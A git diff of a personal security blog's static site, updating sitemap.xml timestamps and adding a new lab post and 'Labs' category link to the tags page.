--git a/sitemap.xml b/sitemap.xml index d07edb7..3ddd870 100644 --- a/sitemap.xml +++ b/sitemap.xml @@ -2,19 +2,25 @@ - https://f0rk3b0mb.github.io/p/bsidesnrb2024/ - 2024-10-26T17:13:14+03:00 - https://f0rk3b0mb.github.io/categories/ - 2024-10-26T17:13:14+03:00 - - https://f0rk3b0mb.github.io/categories/writeups/ - 2024-10-26T17:13:14+03:00 + 2024-11-08T14:33:30+03:00 https://f0rk3b0mb.github.io/ - 2024-10-26T17:13:14+03:00 + 2024-11-08T14:33:30+03:00 + + https://f0rk3b0mb.github.io/p/goad-light/ + 2024-11-08T14:33:30+03:00 + + https://f0rk3b0mb.github.io/categories/labs/ + 2024-11-08T14:33:30+03:00 https://f0rk3b0mb.github.io/post/ + 2024-11-08T14:33:30+03:00 + + https://f0rk3b0mb.github.io/p/bsidesnrb2024/ + 2024-10-26T17:13:14+03:00 + + https://f0rk3b0mb.github.io/categories/writeups/ 2024-10-26T17:13:14+03:00 https://f0rk3b0mb.github.io/categories/reads/ 
diff --git a/tags/index.html b/tags/index.html index 0a29802..a367539 100644 --- a/tags/index.html +++ b/tags/index.html @@ -10,7 +10,7 @@ - + @@ -310,7 +310,7 @@

Archives

2024 - 10 + 11
@@ -349,12 +349,16 @@

Categories

ctf writeups - + + Htb Boxes + + + Reads - - Htb Boxes + + Labs